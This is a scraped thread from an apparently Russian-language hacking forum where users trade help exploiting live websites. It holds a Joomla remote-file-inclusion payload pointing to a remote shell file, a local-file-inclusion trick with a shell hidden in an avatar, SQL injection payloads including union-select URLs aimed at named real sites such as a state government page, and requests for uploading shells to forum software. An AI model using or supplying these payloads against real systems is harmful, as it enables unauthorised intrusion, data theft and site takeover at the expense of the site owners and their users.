Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Всем привет... подскажите, где в mssql хранятся пароли пользователя sa? и какой у них тип... ну и как шифруется?
    Спасибо!
     
  2. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    Есть занятная RFI в жумле. Пытаюсь поюзать:
    mosConfig_absolute_path=http://****.ru/sh.txt?

    Code:
    Restricted access
    :confused: :confused: :confused: :confused:
     
  3. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    Чего-то не понял на счет первого. allow_url_fopen включенный\выключенный=не работает. :confused:
     
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Закрыта бага значит :facepalm:
     
    _________________________
  5. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    Дык, старая версия плагина и с багой. :confused:
     
  6. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Ну вот скажи мне, какая разница между версиями плагина?
    Джумла устроена так, что сторонние компоненты лотаются довольно просто, добавлением строчки в начало бажного скрипта:
    PHP:
    <?php
    defined
    '_JEXEC' ) or die( 'Restricted access' );
    ...
    ?>
     
    _________________________
  7. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    Удалил строчку. Терь ошибки вылетают. :mad: :mad:
     
  8. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Имеется жертва с http://localhost/news.php?do=news&page=2&, Все что следует после 2 обрубается, при подстановке page не int значения или просто пустое выражение вылетает File: /var/www/localhost/news.php
    Line: 33
    MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15,15' at line 1
    Я так понимаю кроме расрытие путей это ничего не дает?
     
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Да, GET-параметро обрабатываеться intval'ом и ничего кроме цифр не пускает. А из-за того, что параметр остается пустой, то SQL-запрос становиться невалидный и вылетает ошибка.
     
    1 person likes this.
  10. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    vbseo lfi. если в аватарку дописать шелл, и проинклюдить подключает как картинку. ava%00.php пишит ошибку, точнее не срабатывает нулл байт, пробывал заменить слешами тоже самое. Выше директории форума не выйти. Какие есть варианты.?*
     
  11. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    Вот такая ситуация скуля в пост запросе делаю так
    select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
    ошибка
    select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
    тоже ошибка
    Пробую без кавычек
    +ORDER+BY+10000;--+
    без ошибок выполняет не ответа ни привета, че делать?
    желательно в пм , помогите уважаемые форумчане
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    пробуй не плюс, а пробел
     
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    В пост запросах нужно использовать пробел вместо знака плюс(+), т.к. знак плюс(+) именно в гет запросах обозначает пробел, т.е. запрос нужно отправить такой:
    Code:
    select state from zip where zipcode = '[B]23243' ORDER BY 1000#[/B]
    или же:
    Code:
    select state from zip where zipcode = '[B]23243' ORDER BY 1000 AND '1'='1[/B]
     
    _________________________
    1 person likes this.
  14. hide

    hide Member

    Joined:
    10 Apr 2011
    Messages:
    49
    Likes Received:
    8
    Reputations:
    0
    помогите раскрутить
    Code:
    http://www.maine.gov/tools/whatsnew/index.php?topic=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
     
  15. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.
     
    #16555 h00lyshit!, 15 Apr 2011
    Last edited: 15 Apr 2011
    5 people like this.
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    А что там читать?
    /* - полный
    -- - строчный
    # - строчный
     
    _________________________
  17. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Кто заливал шелл на MyBB 1.2.10 (имею права админа), поделитесь информацией плз.
     
  18. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    mybb

    http://forum.antichat.ru/thread27777.html
    http://www.securitylab.ru/vulnerability/379819.php
    http://forum.xakepok.org/showthread.php?t=388
    http://securityvulns.ru/docs26044.html
    http://forum.antichat.ru/showthread.php?t=149667
     
    2 people like this.
  19. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    C завидной регулярностью попадаю на такую штуку. Не получается подобрать кол-во полей. Что не так?
    Пример, вот. Ошибка не пропадает, хоть убейся.
    http://www.oaontc.ru/node/243?SysNum=137159
     
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Глаза пошире сделай:
    Code:
    http://www.oaontc.ru/node/243?SysNum=(13715)and(1)=(2)union+select(version()),2,3,4,5,6,7,8/*
     
    _________________________
    1 person likes this.
Thread Status:
Not open for further replies.